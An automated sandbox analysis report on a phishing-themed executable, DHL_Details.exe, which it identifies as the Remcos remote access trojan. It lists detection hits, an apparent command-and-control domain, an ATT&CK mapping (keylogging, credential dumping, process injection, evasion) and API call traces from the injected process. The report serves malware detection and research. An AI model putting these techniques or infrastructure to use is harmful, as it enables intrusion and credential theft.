Loading ...

Play interactive tourEdit tour

Analysis Report DHL_Details.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:224538
Start date:22.04.2020
Start time:18:42:25
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 17m 27s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:DHL_Details.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:21
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.rans.phis.troj.spyw.evad.winEXE@35/10@2/2
EGA Information:
  • Successful, ratio: 33.3%
HDC Information:
  • Successful, ratio: 59.1% (good quality ratio 45.5%)
  • Quality average: 59.6%
  • Quality standard deviation: 40.4%
HCA Information:
  • Successful, ratio: 67%
  • Number of executed functions: 21
  • Number of non-executed functions: 264
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Excluded IPs from analysis (whitelisted): 216.58.215.238, 172.217.168.46, 2.18.68.82, 104.103.72.58, 104.103.72.113
  • Excluded domains from analysis (whitelisted): docs.google.com, au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, audownload.windowsupdate.nsatc.net, drive.google.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
  • Execution Graph export aborted for target DHL_Details.exe, PID 5472 because there are no executed function
  • Execution Graph export aborted for target Xgkuees.exe, PID 4732 because there are no executed function
  • Execution Graph export aborted for target ieinstal.exe, PID 5180 because there are no executed function
  • Execution Graph export aborted for target mshta.exe, PID 5488 because there are no executed function
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Remcos
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Contains functionality to modify the execution of threads in other processes
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting1Registry Run Keys / Startup Folder1Access Token Manipulation1Software Packing11Credential Dumping2System Time Discovery1Remote File Copy21Data from Local System1Data Encrypted1Uncommonly Used Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Replication Through Removable MediaExecution through API2Scheduled Task1Process Injection522Deobfuscate/Decode Files or Information1Credentials in Files3Account Discovery1Remote ServicesScreen Capture1Exfiltration Over Other Network MediumRemote File Copy21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDefacement1
External Remote ServicesGraphical User Interface11Modify Existing Service1Scheduled Task1Scripting1Input Capture221Security Software Discovery1Windows Remote ManagementEmail Collection11Automated ExfiltrationStandard Cryptographic Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseCommand-Line Interface11Application Shimming1Application Shimming1Obfuscated Files or Information2Credentials in Registry1System Service Discovery1Logon ScriptsInput Capture221Data EncryptedRemote Access Tools1SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationService Execution2New Service1New Service1Masquerading1Account ManipulationFile and Directory Discovery3Shared WebrootClipboard Data2Scheduled TransferStandard Non-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkScheduled Task1Modify Existing ServiceNew ServiceModify Registry1Brute ForceSystem Information Discovery46Third-party SoftwareScreen CaptureData Transfer Size LimitsStandard Application Layer Protocol2Jamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskVirtualization/Sandbox Evasion1Two-Factor Authentication InterceptionVirtualization/Sandbox Evasion1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionAccess Token Manipulation1Bash HistoryProcess Discovery3Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess Injection522Input PromptApplication Window Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationScriptingKeychainSystem Owner/User Discovery1Taint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact
Hardware AdditionsExecution through APIFile System Permissions WeaknessValid AccountsIndicator Removal from ToolsPrivate KeysRemote System Discovery1Replication Through Removable MediaVideo CaptureStandard Application Layer ProtocolCommunication Through Removable MediaDisk Structure Wipe

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: u863495.awsmppl.comVirustotal: Detection: 9%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: DHL_Details.exeVirustotal: Detection: 11%Perma Link
Yara detected Remcos RATShow sources
Source: Yara matchFile source: 00000010.00000002.1206561253.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000C.00000002.1182878564.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000C.00000002.1180913234.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1208688497.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 4764, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 5284, type: MEMORY
Source: Yara matchFile source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 12.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 12.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\Xgku\Xgkuees.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: DHL_Details.exeJoe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 16.2.ieinstal.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
Source: 0.2.DHL_Details.exe.10530000.7.unpackAvira: Label: TR/Crypt.Morphine.Gen
Source: 15.2.Xgkuees.exe.10530000.5.unpackAvira: Label: TR/Crypt.Morphine.Gen
Source: 12.2.ieinstal.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
Source: 12.2.ieinstal.exe.10530000.2.unpackAvira: Label: TR/Crypt.Morphine.Gen
Source: 11.2.Xgkuees.exe.10530000.5.unpackAvira: Label: TR/Crypt.Morphine.Gen
Source: 16.2.ieinstal.exe.10530000.2.unpackAvira: Label: TR/Crypt.Morphine.Gen

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Xgku\Xgkuest.exeCode function: 10_2_00404268 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,10_2_00404268
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040740F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040740F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004104E0 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t12_2_004104E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00407183 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_00407183
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00404648 _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA12_2_00404648
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004126D3 wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_004126D3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00404AD4 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00404AD4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00403315 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00403315
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_10536462 FindFirstFileW,FindNextFileW,FindClose,12_2_10536462
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_10544061 FindFirstFileW,FindNextFileW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,FindClose,12_2_10544061
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_10534CA3 FindFirstFileW,12_2_10534CA3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_10538D9D getenv,FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindClose,FindClose,12_2_10538D9D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_10541E6E FindFirstFileW,12_2_10541E6E
